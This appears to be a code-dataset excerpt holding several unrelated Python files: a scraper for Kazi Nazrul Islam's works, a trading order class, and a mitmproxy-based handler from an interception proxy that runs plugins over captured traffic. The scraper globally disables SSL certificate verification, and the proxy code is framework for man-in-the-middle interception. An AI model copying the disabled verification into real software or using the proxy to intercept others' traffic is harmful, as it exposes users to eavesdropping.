package_dict['Sources'][package_dict['Download']]['Version'].vstring, ) if __name__ == '__main__': ARGS = args_parse() main()
2.421875
2
nazrul.py
rakesh0703/Content_Parser_of_works_of_kazi_nazrul
0
11897
# -- coding: UTF-8 -- """ Spyder Editor This is a temporary script file. """ from bs4 import BeautifulSoup import sys import os import ssl ssl._create_default_https_context = ssl._create_unverified_context import urllib.parse,urllib.request,urllib.error base="https://nazrul-rachanabali.nltr.org/" page=urllib.request.urlopen(base).read(); soup=BeautifulSoup(page,'html5lib') ba=soup.find_all("ul",{"class":["slidedoormenu"]}) #print(ba) d=soup.div.ul.find_all('a') #type(d[3]) article_page=(d[3]).get("href") #soup.div.ul.li.a newurl_2=base+article_page page1=urllib.request.urlopen(newurl_2).read() soup1=BeautifulSoup(page1,'html5lib') e=soup1.find_all('a') arr1=[] arr4=[] for link in e[1:9]: f=link.get('href') f=base+f arr1.append(f) arr4.append(link.get_text()) #for k in arr2: for m in range(0,len(arr4)): page1=urllib.request.urlopen(arr1[m]).read() soup1=BeautifulSoup(page1,'html5lib') x=soup1.find_all('div',id='data') arr2=[]; arr3=[]; for i in x: g=i.find_all('a') for k in g[:-7]: arr2.append(k.get('href')) arr3.append(k.get_text()) for z in range(0,len(arr3)): final_url=base+arr2[z] #============================================================================== # page1=urllib.request.urlopen(final_url).read() # soup1=BeautifulSoup(page1,'html5lib') # head = soup1.find_all("p",class_="head1") # headd=head[0].get_text() #============================================================================== filenam = "D:\%s\%s"%(arr4[m],arr3[z]) if not os.path.exists(filenam): os.makedirs(filenam) for i in range(0,110): if arr3[z].endswith(" "): arr3[z]=arr3[z][:-1] filename = "D:\%s\%s\%s_%d.txt"%(arr4[m],arr3[z],arr3[z],i) fi = open(filename, "wb") page1=urllib.request.urlopen(final_url).read() soup1=BeautifulSoup(page1,'html5lib') final_url=base+arr2[z] h=soup1.find_all('div',id="data") for j in h: fi.write(j.text.encode("utf-8")) s=j.text if not s.split(): break a,b=final_url.split('1&titleid=') final_url=a+str(i+1)+"&titleid="+b print('************'+final_url+'***********') fi.close()
2.828125
3
algoplex/api/order.py
dmitryaleks/algo-plex
0
11898
<reponame>dmitryaleks/algo-plex class Order(): def __init__(self, side, pair, size, price, stop_loss_price, id): self.side = side self.pair = pair self.size = size self.price = price self.stop_loss_price = stop_loss_price self.id = id self.fills = [] def define_id(self, id): self.id = id def add_fill(self, execution): self.fills.append(execution) def get_fill_price(self): nominator = sum(map(lambda f: f.size * f.price, self.fills)) fill_price = nominator/self.get_filled_quantity() return fill_price def get_filled_quantity(self): return sum(map(lambda f: f.size, self.fills)) def get_fills(self): return self.fills
2.765625
3
core/handler.py
mh4x0f/kinproxy
5
11899
try: from mitmproxy import controller, proxy from mitmproxy.proxy.server import ProxyServer except: from libmproxy import controller, proxy from libmproxy.proxy.server import ProxyServer from plugins import * from threading import Thread from core.config.settings import SettingsINI # MIT License # # Copyright (c) 2018 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. class ThreadController(Thread): def __init__(self,main ,parent=None): super(ThreadController, self).__init__(parent) self.main = main def run(self): try: controller.Master.run(self.main) except KeyboardInterrupt: self.main.shutdown() def stop(self): self.main.shutdown() class MasterHandler(controller.Master): def __init__(self, server,session): controller.Master.__init__(self, server) self.config = SettingsINI('core/pumpkinProxy.ini') self.session = session self.plugins = [] self.initializePlugins() def run(self): self.thread = ThreadController(self) self.thread.start() def disablePlugin(self,name): ''' disable plugin by name ''' print('plugin:{} status:OFF'.format(name)) for plugin in self.plugins: if plugin.name == name: self.plugins.remove(plugin) def initializePlugins(self): plugin_classes = plugin.PluginTemplate.__subclasses__() for p in plugin_classes: if self.config.get_setting('plugins',p.name,format=bool): print('plugins::{0:20} status:On'.format(p.name)) self.plugins.append(p()) # initialize logging in all plugins enable for instance in self.plugins: instance.init_logger(self.session) def handle_request(self, flow): ''' print "-- request --" print flow.__dict__ print flow.request.__dict__ print flow.request.headers.__dict__ print "--------------" print ''' for p in self.plugins: p.request(flow) flow.reply() def handle_response(self, flow): ''' print print "-- response --" print flow.__dict__ print flow.response.__dict__ print flow.response.headers.__dict__ print "--------------" print ''' for p in self.plugins: p.response(flow) #print flow.__dict__ flow.reply()
1.882813
2